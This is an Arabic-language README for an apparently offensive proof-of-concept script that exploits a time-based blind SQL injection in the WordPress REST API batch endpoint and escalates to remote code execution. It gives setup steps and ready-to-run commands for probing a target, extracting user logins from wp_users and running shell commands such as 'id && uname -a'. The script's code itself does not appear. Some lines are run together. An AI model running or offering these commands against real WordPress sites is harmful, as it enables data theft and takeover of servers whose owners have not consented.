
CVE-2026-63030 وCVE-2026-60137 Wp2shell Poc
poc_wp_tot.py هو إثبات مفهوم (PoC) لاستغلال ثغرة حقن SQL الأعمى القائم على الوقت (time‑based blind SQL injection) في نقطة نهاية الدُفعات (batch) الخاصة بـ WordPress REST API، وتنفيذ سلسلة تصعيد حتى الوصول إلى تنفيذ الأكواد عن بُعد (Remote Code Execution - RCE).
poc_wp_tot.py إلى دليل العمل الخاص بك.python3 -m venv venv
source venv/bin/activate

يوفر السكربت ثلاثة أوضاع تشغيل: probe (الكشف)، extract (استخراج البيانات)، وrce (تنفيذ الأوامر). فيما يلي أمثلة على الاستخدام.
python3 poc_wp_tot.py https://target.example.com/
python3 poc_wp_tot.py -v https://target.example.com/ "SELECT user_login FROM wp_users LIMIT 1"
python3 poc_wp_tot.py https://target.example.com/ -c "id && uname -a"
-h, --help : عرض رسالة المساعدة-v, --verbose: تفعيل الإخراج المفصّل (تصحيح الأخطاء)-c <COMMAND> : وضع RCE — تشغيل أوامر shell على الهدفSLEEP() تُنفَّذ على الخادم الهدف كشرط منطقي (boolean) (حقن SQL أعمى قائم على الوقت).poc_wp_tot.py.calibrate() وget_scalar() وexploit_rce() داخل السكربت.